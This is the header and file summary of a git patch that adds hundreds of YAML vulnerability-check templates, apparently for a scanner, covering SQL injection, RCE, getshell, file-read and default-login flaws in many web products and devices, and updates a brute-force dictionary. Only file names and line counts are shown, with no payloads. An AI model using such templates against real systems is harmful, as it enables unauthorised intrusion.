From a30fc49509732a790dd1c4283beb2ae67ee603fc Mon Sep 17 00:00:00 2001 From: hktalent <18223385+hktalent@users.noreply.github.com> Date: Sat, 10 Dec 2022 12:24:48 +0800 Subject: [PATCH] up 2022-12-10 --- ZXRjZAo=.txt | 100 - ZXRjZCBwb3J0OjIzNzkK.txt | 100 - brute/dicts/softc.txt | 2051 ++++++++--------- config/51pwn/CVE-2022-1388.yaml | 3 +- config/51pwn/CVE-2022-2414.yaml | 34 + config/51pwn/CVE-2022-25765.yaml | 47 + .../yaml/ H5S CONSOLE/CNVD-2020-67113.yaml | 51 + .../ Inspur ClusterEngine/CVE-2020-21224.yaml | 41 + .../inspur-clusterengine-default-login.yaml | 46 + .../netgear-router-auth-bypass.yaml | 38 + .../CVE-2018-12998.yaml | 35 + .../yaml/ faust_iserver/CVE-2021-34805.yaml | 50 + .../51pwn/yaml/11in1 CMS/CVE-2012-0996.yaml | 32 + config/51pwn/yaml/74cms/74cms-Getshell.yaml | 40 + config/51pwn/yaml/74cms/74cms-show-sqli.yaml | 40 + .../74cms/74cms-v3-Boolean-injection.yaml | 41 + config/51pwn/yaml/74cms/74cms-xss.yaml | 26 + .../51pwn/yaml/74cms/74cms_V3-plusa-sqli.yaml | 36 + config/51pwn/yaml/74cms/74cms_file_read.yaml | 39 + .../yaml/74cms/74cms_v4-register-sqli.yaml | 39 + .../51pwn/yaml/74cms/wooyun-2010-075009.yaml | 47 + .../51pwn/yaml/74cms/wooyun-2014-063225.yaml | 39 + .../51pwn/yaml/74cms/wooyun-2014-069833.yaml | 28 + .../51pwn/yaml/74cms/wooyun-2015-0137785.yaml | 47 + .../yaml/ACME mini_httpd/CVE-2018-18778.yaml | 42 + config/51pwn/yaml/ADB/CVE-2015-0554.yaml | 35 + config/51pwn/yaml/APISIX/CVE-2020-13945.yaml | 52 + config/51pwn/yaml/APISIX/CVE-2021-45232.yaml | 33 + config/51pwn/yaml/APISIX/CVE-2022-24112.yaml | 70 + .../yaml/APISIX/apisix-default-login.yaml | 42 + .../wooyun-2010-0113020.yaml" | 24 + .../wooyun-2010-074765.yaml" | 38 + .../wooyun-2010-088177.yaml" | 38 + .../wooyun-2015-0103389.yaml" | 24 + .../AppCMS-File-download-vulnerability.yaml | 35 + .../51pwn/yaml/APPCMS/appcms-databases.yaml | 35 + .../51pwn/yaml/APPCMS/wooyun-2010-045643.yaml | 35 + .../yaml/APPCMS/wooyun-2015-0139684.yaml | 36 + .../yaml/ASUS GT-AC2900/CVE-2021-32030.yaml | 37 + .../yaml/AVCON6/avcon6-download-lfd.yaml | 31 + .../yaml/AVCON6/avcon6-infomation-leak.yaml | 39 + .../yaml/AVCON6/avcon6-infomation-rce.yaml | 30 + .../yaml/AVTECH/AVTECH-Machine-info.yaml | 35 + .../51pwn/yaml/AVTECH/AVTECH-cgibox-lfd.yaml | 31 + config/51pwn/yaml/AVTECH/ssvid-92494.yaml | 35 + .../Accela Civic Platform/CVE-2021-33904.yaml | 34 + .../Accela Civic Platform/CVE-2021-34370.yaml | 25 + .../yaml/Acrolinx Server/CVE-2018-7719.yaml | 36 + config/51pwn/yaml/ActiveMQ/CVE-2018-8006.yaml | 31 + .../yaml/ActiveMQ/activemq-default-login.yaml | 38 + .../yaml/ActiveMQ/poc-yaml-CVE-2016-3088.yaml | 40 + config/51pwn/yaml/Adminer/CVE-2021-21311.yaml | 29 + config/51pwn/yaml/Adminer/CVE-2021-29625.yaml | 33 + .../CVE-2016-0957.yaml" | 33 + .../CVE-2020-35598.yaml | 28 + .../Advanced-city-sqli.yaml | 34 + .../Advanced-locat-sqli.yaml | 34 + .../Advanced_v4-state-sqli.yaml | 34 + .../Advantech R-SeeNet/CVE-2021-21801.yaml | 33 + .../Advantech R-SeeNet/CVE-2021-21802.yaml | 34 + .../Advantech R-SeeNet/CVE-2021-21803.yaml | 34 + config/51pwn/yaml/Airflow/Airflow-Unauth.yaml | 31 + config/51pwn/yaml/Airflow/CVE-2020-11978.yaml | 54 + config/51pwn/yaml/Airflow/CVE-2020-13927.yaml | 27 + config/51pwn/yaml/Airflow/CVE-2021-38540.yaml | 65 + config/51pwn/yaml/Airflow/CVE-2022-24288.yaml | 28 + .../airflow-configuration-exposure.yaml | 29 + config/51pwn/yaml/Airflow/airflow-debug.yaml | 31 + .../yaml/Airflow/airflow-default-login.yaml | 55 + .../CVE-2020-27361.yaml | 30 + .../CVE-2021-31581.yaml | 35 + config/51pwn/yaml/Alerta/CVE-2020-26214.yaml | 40 + .../CVE-2019-14223.yaml | 29 + .../8/CVE-2019-18922.yaml | 28 + .../CVE-2021-28937.yaml | 29 + .../yaml/Ambari/ambari-default-login.yaml | 40 + .../51pwn/yaml/AnchorCMS/CVE-2018-7251.yaml | 26 + .../yaml/Apache ActiveMQ/cve-2015-1830.yaml | 34 + .../yaml/Apache ActiveMQ/cve-2016-3088.yaml | 38 + .../yaml/Apache Struts/CVE-2013-2248.yaml | 29 + .../yaml/Apache Struts/CVE-2019-0230.yaml | 24 + config/51pwn/yaml/Apache Struts/S2-001.yaml | 42 + config/51pwn/yaml/Apache Struts/S2-003.yaml | 44 + config/51pwn/yaml/Apache Struts/S2-008.yaml | 28 + config/51pwn/yaml/Apache Struts/S2-012.yaml | 44 + config/51pwn/yaml/Apache Struts/S2-016.yaml | 45 + config/51pwn/yaml/Apache Struts/S2-032.yaml | 44 + config/51pwn/yaml/Apache Struts/S2-052.yaml | 93 + config/51pwn/yaml/Apache Struts/S2-053.yaml | 47 + config/51pwn/yaml/Apache Struts/S2-057.yaml | 44 + config/51pwn/yaml/Apache Struts/S2-062.yaml | 62 + .../CVE-2021-25646.yaml" | 75 + .../CVE-2021-36749.yaml" | 38 + .../druid-default-login.yaml" | 41 + .../druid-monitor.yaml" | 27 + .../CVE-2016-4975.yaml" | 24 + .../CVE-2017-15715.yaml" | 54 + .../CVE-2019-10092.yaml" | 24 + .../CVE-2020-9490.yaml" | 22 + .../CVE-2021-40438.yaml" | 31 + .../CVE-2021-41773.yaml" | 45 + .../CVE-2021-42013.yaml" | 40 + .../apache-filename-enum.yaml" | 33 + .../Apexis/Apexis-IP-CAM-Password-Read.yaml | 35 + .../Apexis-IPCAM-directory-traversal.yaml | 26 + .../51pwn/yaml/Apexis/Apexis-IPCAM-info.yaml | 35 + config/51pwn/yaml/AppServ/CVE-2008-2398.yaml | 40 + .../CVE-2020-11854.yaml | 30 + config/51pwn/yaml/Appweb/CVE-2018-8715.yaml | 30 + .../yaml/Aptana Jaxer/CVE-2019-14312.yaml | 28 + .../CVE-2018-15745.yaml | 31 + .../Artica Pandora FMS/CVE-2020-8497.yaml | 30 + .../CVE-2020-13158.yaml | 26 + .../CVE-2020-17505.yaml | 39 + .../CVE-2020-17506.yaml | 41 + .../yaml/Artifactory/CVE-2019-17444.yaml | 39 + .../51pwn/yaml/Artifactory/CVE-2019-9733.yaml | 42 + .../yaml/Aruba AirWave/CVE-2016-8527.yaml | 35 + .../Atlassian Confluence/CVE-2015-8399.yaml | 34 + .../Atlassian Confluence/CVE-2018-20824.yaml | 47 + .../Atlassian Confluence/CVE-2019-3396.yaml | 29 + .../Atlassian Confluence/CVE-2021-26084.yaml | 56 + .../Atlassian Confluence/cve-2021-26085.yaml | 34 + .../poc-yaml-Confluence-ognl-rce.yaml | 40 + .../wooyun-2016-0208641.yaml | 32 + .../yaml/Atlassian Crowda/CVE-2019-11580.yaml | 29 + .../yaml/AudioCodes 400HD/CVE-2018-10093.yaml | 35 + .../CVE-2021-31682.yaml | 55 + .../51pwn/yaml/AvantFAX/CVE-2017-18024.yaml | 41 + config/51pwn/yaml/AwStats/CVE-2009-5020.yaml | 32 + config/51pwn/yaml/AwStats/CVE-2012-4547.yaml | 31 + .../Axigen Mail Server/CVE-2012-4940.yaml | 35 + config/51pwn/yaml/Axis2/CVE-2010-0219.yaml | 44 + .../axublog-adlogin-sql-injection.yaml | 39 + .../yaml/Axublog/axublog-goindes-xss.yaml | 27 + .../51pwn/yaml/Axublog/axublog-hit-sqli.yaml | 37 + .../axublog-login-universal-password.yaml | 31 + .../yaml/Axublog/axublog-v1-cookiebypass.yaml | 38 + .../Axublog/axublog_v1-ad-admin-sqli.yaml | 42 + .../yaml/Axublog/axublog_v1-app-lfr.yaml | 48 + .../yaml/Axublog/axublog_v1-hitphp-sqli.yaml | 35 + .../yaml/Axublog/axublog_v1-search-sqli.yaml | 35 + .../51pwn/yaml/Axublog/axublog_v1-upload.yaml | 49 + .../AxxonSoft Axxon Next/CVE-2018-7467.yaml | 36 + .../yaml/B2Bbuilder/B2Bbuilder-sms-sqli.yaml | 37 + .../yaml/B2Bbuilder/B2Bbuilder-sqli.yaml | 37 + .../B2Bbuilder/B2Bbuilder_v7-getshell.yaml | 43 + .../yaml/BEESCMS/beescms-header-sqli.yaml | 41 + .../yaml/BEESCMS/beescms-memberpost-sqli.yaml | 37 + .../yaml/BEESCMS/beescms-mxform-sqli.yaml | 40 + .../yaml/BEESCMS/beescms-order-save-sqli.yaml | 37 + .../51pwn/yaml/BEESCMS/beescms-save-sqli.yaml | 40 + .../yaml/BEESCMS/beescms-v3-member-sqli.yaml | 81 + .../beescms_v3-login-sql-injection.yaml | 41 + .../BEESCMS/beescms_v4-Permission-bypass.yaml | 40 + .../yaml/BEESCMS/beescms_v4-login-sqli.yaml | 48 + config/51pwn/yaml/BIG-IP/CVE-2020-5902.yaml | 89 + config/51pwn/yaml/BIG-IP/CVE-2021-22986.yaml | 68 + config/51pwn/yaml/BIG-IP/CVE-2022-1388.yaml | 78 + config/51pwn/yaml/Babel/CVE-2019-1010290.yaml | 25 + .../CVE-2019-3929.yaml | 39 + .../CVE-2014-2962.yaml" | 27 + .../CVE-2021-31589.yaml | 32 + .../CVE-2021-3577.yaml | 31 + .../Biqs It Biqs-drive/CVE-2021-39433.yaml | 28 + .../51pwn/yaml/Bitrix24/CVE-2020-13483.yaml | 39 + .../yaml/BlackArmor NAS/CVE-2014-3206.yaml | 35 + .../yaml/BlackArmor NAS/CVE-2018-12296.yaml | 32 + .../BlueCMS/BlueCMS-install-restinstall.yaml | 29 + .../yaml/BlueCMS/BlueCMS_v1-adjs-sqli.yaml | 35 + .../BlueCMS/BlueCMS_v1-guest-book-XSS.yaml | 26 + .../yaml/BlueCMS/wooyun-2010-021082.yaml | 31 + config/51pwn/yaml/Bo-Blog/Bo-Blog-go-rce.yaml | 29 + .../51pwn/yaml/Bo-Blog/Bo-Blog-tag-xss.yaml | 37 + .../yaml/Boa Webserver/CVE-2017-9833.yaml | 33 + .../51pwn/yaml/Bonita BPM/CVE-2015-3897.yaml | 39 + .../yaml/Bookinge/Bookinge-city-sqli.yaml | 38 + .../yaml/Bookinge/Bookinge-info-sqli.yaml | 35 + .../yaml/Bookinge/wooyun-2015-0137378-1.yaml | 35 + .../yaml/Bookinge/wooyun-2015-0137378.yaml | 35 + .../Buffalo WSR-2533DHPL2/CVE-2021-20090.yaml | 33 + .../Buffalo WSR-2533DHPL2/CVE-2021-20091.yaml | 44 + .../Buffalo WSR-2533DHPL2/CVE-2021-20092.yaml | 51 + config/51pwn/yaml/CGit/CVE-2018-14912.yaml | 34 + config/51pwn/yaml/CHIYU/CVE-2021-31249.yaml | 33 + config/51pwn/yaml/CHIYU/CVE-2021-31250.yaml | 32 + .../yaml/CLink Office/CVE-2020-6171.yaml | 35 + .../51pwn/yaml/CMSEASY/CMSEASY-Flash-XSS.yaml | 28 + .../51pwn/yaml/CMSEASY/CmsEasy-bss-xss.yaml | 28 + .../yaml/CMSEASY/Cmseasy-Http-Head-sqli.yaml | 57 + .../yaml/CMSEASY/Cmseasy-celive-sqli.yaml | 37 + .../yaml/CMSEASY/Cmseasy_v5-archive-sqli.yaml | 35 + .../51pwn/yaml/CMSEASY/cmseasy-aid-sqli.yaml | 35 + .../cmseasy-index-CommandExecution.yaml | 34 + .../yaml/CMSEASY/wooyun-2014-069363.yaml | 28 + config/51pwn/yaml/CMSMS/CVE-2018-10523-1.yaml | 25 + config/51pwn/yaml/CMSMS/CVE-2018-10523.yaml | 25 + .../51pwn/yaml/CMSTOP/CMSTop-vote-sqli.yaml | 34 + .../51pwn/yaml/CMSTOP/wooyun-2014-054693.yaml | 30 + config/51pwn/yaml/CMSimple/CVE-2008-2650.yaml | 37 + .../yaml/CSE Bookstore/CVE-2020-36112.yaml | 37 + config/51pwn/yaml/Cacti/CVE-2020-8813.yaml | 27 + config/51pwn/yaml/Cacti/CVE-2021-26247.yaml | 33 + .../Cacti/Cacti-Weathermap-FileUpload.yaml | 42 + config/51pwn/yaml/Cacti/cacti-WeakPass.yaml | 35 + config/51pwn/yaml/Cacti/cacti-cacti-info.yaml | 35 + config/51pwn/yaml/Cacti/cacti-sql-info.yaml | 35 + .../51pwn/yaml/Cacti/wooyun-2016-0190596.yaml | 42 + .../Cacti-Weathermap-FileWrite.yaml" | 28 + .../yaml/Camtron IP Camera/CVE-2010-4231.yaml | 31 + .../yaml/Canal/alibaba-canal-info-leak.yaml | 41 + .../51pwn/yaml/Canal/canal-default-login.yaml | 41 + .../51pwn/yaml/Canvas LMS/CVE-2020-5775.yaml | 23 + .../51pwn/yaml/CaseAware/CVE-2017-5631.yaml | 35 + .../51pwn/yaml/Cassandra/CVE-2021-44521.yaml | 52 + .../yaml/CentOS Web Panel/CVE-2018-18323.yaml | 28 + config/51pwn/yaml/Cherokee/CVE-2006-1681.yaml | 34 + config/51pwn/yaml/Chyrp/CVE-2011-2744.yaml | 33 + config/51pwn/yaml/Chyrp/CVE-2011-2780.yaml | 34 + .../CirCarLife Scada/CNVD-2018-11985.yaml | 47 + .../CirCarLife Scada/CNVD-2018-19403.yaml | 22 + .../CirCarLife Scada/CNVD-2018-19569.yaml | 37 + .../yaml/CirCarLife Scada/CVE-2018-12634.yaml | 38 + .../yaml/CirCarLife Scada/CVE-2018-16668.yaml | 35 + .../yaml/CirCarLife Scada/CVE-2018-16670.yaml | 35 + .../yaml/CirCarLife Scada/CVE-2018-16671.yaml | 37 + .../yaml/Cisco 7937G/CVE-2020-16139.yaml | 31 + .../Cisco DDR2200 ADSL2/CNVD-2017-25744.yaml | 27 + .../51pwn/yaml/Cisco IOS/CVE-2017-3881.yaml | 33 + .../51pwn/yaml/Cisco IOS/CVE-2018-0127.yaml | 43 + .../51pwn/yaml/Cisco IOS/CVE-2019-1653.yaml | 39 + .../51pwn/yaml/Cisco IOS/CVE-2019-1821.yaml | 48 + .../51pwn/yaml/Cisco IOS/CVE-2021-1497.yaml | 47 + .../51pwn/yaml/Cisco IOS/CVE-2021-1498.yaml | 40 + .../51pwn/yaml/Cisco IOS/CVE-2021-1499.yaml | 63 + .../Cisco SD-WAN vManage/CVE-2020-26073.yaml | 35 + .../CVE-2011-3315.yaml | 26 + .../CVE-2013-5528.yaml | 28 + .../yaml/Citrix ShareFile/CVE-2020-8982.yaml | 34 + .../CVE-2019-19781.yaml" | 38 + .../CVE-2020-8191.yaml" | 41 + .../CVE-2020-8193.yaml" | 68 + .../CVE-2020-8194.yaml" | 37 + .../yaml/Clansphere CMS/CVE-2021-27310.yaml | 35 + .../yaml/ClinicCases/CVE-2021-38704.yaml | 29 + .../51pwn/yaml/Cobbler/CVE-2018-1000226.yaml | 57 + config/51pwn/yaml/Cobbler/CVE-2021-40323.yaml | 92 + config/51pwn/yaml/Cockpit/CVE-2020-35846.yaml | 47 + config/51pwn/yaml/Cockpit/CVE-2020-35847.yaml | 38 + config/51pwn/yaml/Cockpit/CVE-2020-35848.yaml | 38 + config/51pwn/yaml/Cocoon/CVE-2020-11991.yaml | 38 + config/51pwn/yaml/Cofax/CVE-2005-4385.yaml | 25 + .../51pwn/yaml/ColdFusion/CVE-2009-1872.yaml | 35 + .../51pwn/yaml/ColdFusion/CVE-2010-2861.yaml | 32 + .../51pwn/yaml/ColdFusion/CVE-2018-15961.yaml | 64 + .../yaml/ColdFusion/coldfusion-debug-xss.yaml | 36 + .../yaml/ColdFusion/unpatched-coldfusion.yaml | 37 + .../yaml/Combodo iTop/CVE-2015-6544.yaml | 30 + .../51pwn/yaml/CommCell/CVE-2020-25780.yaml | 47 + .../Comodo UTM Firewall/CVE-2018-17431.yaml | 38 + config/51pwn/yaml/Consul/CVE-2020-25864.yaml | 43 + .../51pwn/yaml/Consul/consul-rexec-rce.yaml | 39 + .../51pwn/yaml/Consul/consul-service-rce.yaml | 39 + .../Coremail/coremail-config-disclosure.yaml | 35 + config/51pwn/yaml/CouchCMS/CVE-2018-7662.yaml | 36 + config/51pwn/yaml/CouchDB/CVE-2017-12635.yaml | 48 + config/51pwn/yaml/CouchDB/couchdb-unauth.yaml | 35 + config/51pwn/yaml/CraftCMS/CVE-2020-9757.yaml | 48 + .../yaml/CyBroHttpServer/CVE-2018-16133.yaml | 37 + .../Cyberoam NetGenie/CVE-2021-38702.yaml | 34 + config/51pwn/yaml/D-Link/CVE-2018-10822.yaml | 27 + config/51pwn/yaml/D-Link/CVE-2018-10823.yaml | 26 + config/51pwn/yaml/D-Link/CVE-2018-15517.yaml | 24 + config/51pwn/yaml/D-Link/CVE-2019-13101.yaml | 30 + config/51pwn/yaml/D-Link/CVE-2019-16920.yaml | 51 + config/51pwn/yaml/D-Link/CVE-2019-17506.yaml | 34 + config/51pwn/yaml/D-Link/CVE-2020-24579.yaml | 34 + config/51pwn/yaml/D-Link/CVE-2020-25078.yaml | 33 + config/51pwn/yaml/D-Link/CVE-2020-25506.yaml | 32 + config/51pwn/yaml/D-Link/CVE-2020-9376.yaml | 34 + config/51pwn/yaml/D-Link/CVE-2021-21816.yaml | 31 + config/51pwn/yaml/D-Link/CVE-2021-46379.yaml | 24 + config/51pwn/yaml/D-Link/CVE-2021-46381.yaml | 25 + .../yaml/D-Link/dlink-850L-info-leak.yaml | 34 + config/51pwn/yaml/D-Link/dlink-file-read.yaml | 27 + .../CVE-2017-0929.yaml" | 35 + .../CVE-2017-9822.yaml" | 38 + config/51pwn/yaml/DVR/CVE-2018-9995.yaml | 36 + .../51pwn/yaml/Dahua IPC/CVE-2021-33044.yaml | 47 + .../CVE-2020-5307.yaml | 33 + .../51pwn/yaml/Dasan GPON/CVE-2018-10562.yaml | 40 + .../yaml/Dayrui FineCms/CVE-2017-11584.yaml | 36 + .../yaml/Deciso OPNsense/CVE-2020-23015.yaml | 22 + config/51pwn/yaml/Dell EMC/CVE-2018-1207.yaml | 29 + .../yaml/Deltek Maconomy/CVE-2019-12314.yaml | 35 + .../51pwn/yaml/Discuz!/Discuz-V72-SQLi.yaml | 37 + .../Discuz!/Discuz-WechatPlugins-Unauth.yaml | 37 + .../yaml/Discuz!/Discuz-ece-language.yaml | 55 + .../51pwn/yaml/Discuz!/Discuz-info-api.yaml | 32 + .../51pwn/yaml/Discuz!/Discuz-lfd-hux_wx.yaml | 36 + .../yaml/Discuz!/Discuz-lfd-milu_seotool.yaml | 36 + .../Discuz!/Discuz-sqli-batch_common.yaml | 38 + .../Discuz!/Discuz-sqli-forummission.yaml | 38 + .../Discuz-sqli-nds_ques_viewanswe.yaml | 38 + .../Discuz!/Discuz-sqli-v63shop_goods.yaml | 43 + .../Discuz!/Discuz-unauthorized-tools.yaml | 36 + .../51pwn/yaml/Discuz!/Discuz-xss-admin.yaml | 31 + .../yaml/Discuz!/Discuz-xss-admincp.yaml | 31 + .../51pwn/yaml/Discuz!/Discuz-xss-ajax.yaml | 31 + .../yaml/Discuz!/Discuz_x3_2-sqlimisc.yaml | 38 + .../yaml/Discuz!/Wooyun-2010-080723.yaml | 34 + .../yaml/Discuz!/discuz-info-admincp.yaml | 32 + .../Discuz!/discuz-info-config_ucenter.yaml | 34 + .../51pwn/yaml/Discuz!/discuz-rce-misc.yaml | 33 + config/51pwn/yaml/Discuz!/discuz-sqli-my.yaml | 42 + .../yaml/Discuz!/discuz-sqli-nds_up_ques.yaml | 40 + .../51pwn/yaml/Discuz!/discuz-sqli-shop.yaml | 41 + .../51pwn/yaml/Discuz!/discuz-ssrf-forum.yaml | 41 + .../yaml/Discuz!/wooyun-2015-0131386.yaml | 36 + config/51pwn/yaml/Django/CVE-2017-12794.yaml | 35 + config/51pwn/yaml/Django/CVE-2018-14574.yaml | 34 + config/51pwn/yaml/Django/CVE-2020-9402.yaml | 35 + .../yaml/Docker/docker-compose-config.yaml | 36 + config/51pwn/yaml/Docker/docker-registry.yaml | 24 + .../51pwn/yaml/Docker/dockercfg-config.yaml | 33 + .../Docker/dockerfile-hidden-disclosure.yaml | 37 + .../51pwn/yaml/Docker/exposed-docker-api.yaml | 38 + .../yaml/Docker/misconfigured-docker.yaml | 32 + .../51pwn/yaml/DokuWiki/CVE-2017-12583.yaml | 35 + config/51pwn/yaml/Dolibarr/CVE-2012-1226.yaml | 35 + .../51pwn/yaml/Dolibarr/CVE-2018-10095.yaml | 35 + .../dolphinscheduler-default-login.yaml | 40 + config/51pwn/yaml/DomPHP/CVE-2014-10037.yaml | 34 + .../51pwn/yaml/Dotnetcms/Dotnetcms-SQLi.yaml | 29 + .../CVE-2017-15287.yaml | 28 + .../51pwn/yaml/Drupai CMS/CVE-2014-3704.yaml | 34 + .../51pwn/yaml/Drupai CMS/CVE-2018-7600.yaml | 60 + .../51pwn/yaml/Drupai CMS/CVE-2018-7602.yaml | 70 + .../51pwn/yaml/Drupai CMS/CVE-2018-9205.yaml | 29 + .../51pwn/yaml/Drupai CMS/CVE-2019-6340.yaml | 45 + config/51pwn/yaml/Drupal/CVE-2021-32682.yaml | 42 + .../yaml/Dubbo/dubbo-admin-default-login.yaml | 41 + .../yaml/DuomiCms/duomicms-sql-injection.yaml | 31 + .../CNVD-2020-57264.yaml" | 27 + .../51pwn/yaml/E-office/CNVD-2021-49104.yaml | 41 + .../E-office-do_excel-FileUpload.yaml | 28 + .../yaml/E-office/E-office10-Upload.yaml | 50 + .../yaml/E-office/wooyun-2010-087500.yaml | 34 + .../yaml/E-office/wooyun-2015-0125282.yaml | 70 + .../yaml/E-office/wooyun-2015-0125592.yaml | 72 + .../yaml/E-office/wooyun-2015-0125638.yaml | 64 + .../yaml/ECTouch CMS/etouch-v2-sqli.yaml | 28 + config/51pwn/yaml/EPrints/CVE-2021-26475.yaml | 31 + .../yaml/EWEB Gateway/CNVD-2021-09650.yaml | 41 + .../EWEB Gateway/ruijie-eg-password-leak.yaml | 47 + .../yaml/EWEB Gateway/ruijie-eg-rce.yaml | 56 + .../EWEB Gateway/ruijie-networks-rce.yaml | 40 + .../CVE-2018-12031.yaml | 32 + .../Ecshop/Ecshop-CollectionList-SQLi.yaml | 35 + config/51pwn/yaml/Ecshop/Ecshop-Rce.yaml | 43 + config/51pwn/yaml/Ecshop/ecshop-sqli.yaml | 47 + .../CVE-2021-29203.yaml | 50 + .../CVE-2020-24550.yaml | 33 + .../yaml/ElasticSearch/CVE-2014-3120.yaml | 56 + .../yaml/ElasticSearch/CVE-2015-1427.yaml | 49 + .../yaml/ElasticSearch/CVE-2015-3337.yaml | 31 + .../yaml/ElasticSearch/CVE-2015-5531.yaml | 54 + .../yaml/ElasticSearch/CVE-2021-22145.yaml | 40 + .../yaml/ElasticSearch/elasticsearch.yaml | 40 + .../Embedthis GoAhead/CVE-2017-17562.yaml | 97 + .../yaml/Emby Server/CVE-2020-26948.yaml | 39 + .../CVE-2019-20183.yaml | 62 + .../CVE-2018-16059.yaml | 47 + .../CNVD-2021-10543.yaml | 29 + .../CVE-2015-2166.yaml | 27 + config/51pwn/yaml/Erxes/CVE-2021-32853.yaml | 49 + .../yaml/Etherpad Lite/CVE-2018-9845.yaml | 31 + .../51pwn/yaml/Exchange/CVE-2021-26855.yaml | 33 + .../51pwn/yaml/Exchange/CVE-2021-34473.yaml | 28 + .../51pwn/yaml/Exchange/CVE-2021-41349.yaml | 45 + .../yaml/ExponentCMS/CVE-2021-38751.yaml | 45 + .../Express handlebars/CVE-2021-32820.yaml | 52 + config/51pwn/yaml/EyouCMS/CVE-2021-39501.yaml | 46 + .../YonyouFE-sqli-schedule.yaml" | 36 + .../wooyun-2010-082455.yaml" | 47 + .../wooyun-2010-086697.yaml" | 37 + .../wooyun-2015-093724.yaml" | 79 + .../yonyouFE-SQLI-file_publish_open.yaml" | 36 + .../yonyouFE-sqli-assetsTestList.yaml" | 38 + .../yonyou_fe-sqli-left.yaml" | 38 + .../youyou_FE-SQLI-showphoto.yaml" | 40 + config/51pwn/yaml/FHEM/CVE-2020-19360.yaml | 52 + config/51pwn/yaml/FTD/ASA/CVE-2018-0296.yaml | 37 + config/51pwn/yaml/FTD/ASA/CVE-2020-3187.yaml | 37 + config/51pwn/yaml/FTD/ASA/CVE-2020-3452.yaml | 26 + config/51pwn/yaml/FTD/ASA/CVE-2020-3580.yaml | 37 + .../51pwn/yaml/FUEL CMS/CVE-2018-16763.yaml | 54 + .../yaml/Fangweicms/Fangweicms-SQLi.yaml | 34 + .../fastjson1_2_47-rce-Deserialization.yaml | 51 + .../51pwn/yaml/FiberHome/CVE-2017-15647.yaml | 24 + .../FineReport/finereport-path-traversal.yaml | 35 + .../yaml/Firewall Analyze/CVE-2012-4889.yaml | 29 + config/51pwn/yaml/Flask/CVE-2021-32618.yaml | 45 + config/51pwn/yaml/Flatnux/CVE-2012-4878.yaml | 24 + .../51pwn/yaml/FlightPath/CVE-2019-13396.yaml | 61 + .../yaml/ForgeRock AM/CVE-2021-35464.yaml | 32 + .../yaml/Fortigate SSL VPN/CVE-2015-1880.yaml | 49 + .../51pwn/yaml/Fortilogger/CVE-2021-3378.yaml | 82 + .../Fortinet FortiMail/CVE-2021-43062.yaml | 53 + .../yaml/Fortinet FortiOS /CVE-2016-3978.yaml | 45 + .../Fortinet FortiOS /CVE-2018-13379.yaml | 39 + .../Fortinet FortiOS /CVE-2018-13380.yaml | 57 + .../Fortinet FortiWeb/CVE-2021-22122.yaml | 30 + config/51pwn/yaml/GNU Bash/CVE-2014-6271.yaml | 43 + config/51pwn/yaml/GateOne/CVE-2020-35736.yaml | 44 + .../CVE-2021-33544.yaml" | 49 + .../51pwn/yaml/Ghost CMS/CVE-2021-29484.yaml | 52 + config/51pwn/yaml/Gila CMS/CVE-2020-5515.yaml | 36 + config/51pwn/yaml/GitLab/CVE-2020-26413.yaml | 75 + config/51pwn/yaml/GitLab/CVE-2021-22205.yaml | 155 ++ config/51pwn/yaml/GitLab/CVE-2021-22214.yaml | 59 + config/51pwn/yaml/GitLab/CVE-2021-4191.yaml | 64 + .../yaml/GitLab/gitlab-api-user-enum.yaml | 47 + .../yaml/GitLab/gitlab-public-repos.yaml | 38 + .../yaml/GitLab/gitlab-public-snippets.yaml | 41 + .../GitLab/gitlab-uninitialized-password.yaml | 48 + .../51pwn/yaml/GitLab/gitlab-weak-login.yaml | 63 + config/51pwn/yaml/Gitblit/CVE-2022-31268.yaml | 35 + config/51pwn/yaml/GoCD/CVE-2021-43287.yaml | 36 + .../yaml/GoCD/gocd-cruise-configuration.yaml | 40 + .../51pwn/yaml/GoCD/gocd-encryption-key.yaml | 41 + config/51pwn/yaml/GoCD/gocd-login.yaml | 36 + .../yaml/GoCD/gocd-unauth-dashboard.yaml | 40 + config/51pwn/yaml/Gogs/CVE-2014-8682.yaml | 29 + config/51pwn/yaml/Gogs/CVE-2018-18925.yaml | 55 + .../Google Kubernetes/CVE-2018-18264.yaml | 29 + .../Google Kubernetes/CVE-2019-11248.yaml | 36 + .../kubernetes-kustomization-disclosure.yaml | 39 + .../kubernetes-pods-api.yaml | 35 + config/51pwn/yaml/Grafana/CVE-2020-11110.yaml | 45 + config/51pwn/yaml/Grafana/CVE-2021-27358.yaml | 36 + config/51pwn/yaml/Grafana/CVE-2021-39226.yaml | 35 + config/51pwn/yaml/Grafana/CVE-2021-41174.yaml | 36 + config/51pwn/yaml/Grafana/CVE-2021-43798.yaml | 34 + config/51pwn/yaml/Grafana/CVE-2022-26148.yaml | 55 + .../yaml/Grafana/grafana-default-login.yaml | 49 + .../yaml/Grafana/grafana-public-signup.yaml | 41 + .../51pwn/yaml/GrandNode/CVE-2019-12276.yaml | 46 + .../51pwn/yaml/Graphite/CVE-2017-18638.yaml | 22 + config/51pwn/yaml/Grav CMS/CVE-2018-5233.yaml | 30 + .../51pwn/yaml/Grav CMS/CVE-2020-11529.yaml | 48 + config/51pwn/yaml/Gridx/CVE-2020-19625.yaml | 53 + .../unauthorized-h3csecparh-login.yaml" | 38 + .../h3c-imc-rce.yaml" | 44 + .../51pwn/yaml/HBase/apache-hbase-unauth.yaml | 37 + .../hjtcloud-arbitrary-file-read.yaml" | 48 + .../HPE Data Protector/CVE-2016-2004.yaml | 23 + .../CVE-2017-12544.yaml | 31 + config/51pwn/yaml/Hadoop/hadoop-unauth.yaml | 60 + .../yaml/Hadoop/yarn-resourcemanager-rce.yaml | 33 + config/51pwn/yaml/Harbor/CVE-2019-16097.yaml | 44 + .../AmttHiboss-Server-Rce.yaml" | 34 + .../51pwn/yaml/HighMail/CVE-2020-23517.yaml | 46 + .../yaml/Hikvision Cameras/CVE-2017-7921.yaml | 38 + .../Hikvision Web Server/CVE-2021-36260.yaml | 43 + .../CVE-2021-31602.yaml | 36 + .../pentaho-default-login.yaml | 43 + .../yaml/Homematic CCU3/CVE-2019-9726.yaml | 44 + .../yaml/Hongdian H8922/CVE-2021-28149.yaml | 48 + .../yaml/Hongdian H8922/CVE-2021-28150.yaml | 45 + .../yaml/Hongdian H8922/CVE-2021-28151.yaml | 53 + .../yaml/Horde Framework/CVE-2005-3344.yaml | 27 + .../yaml/Horde Framework/CVE-2009-0932.yaml | 29 + .../CVE-2019-8937.yaml" | 32 + .../CVE-2021-37833.yaml" | 39 + .../CVE-2017-12542.yaml | 33 + .../CVE-2005-2428.yaml | 28 + 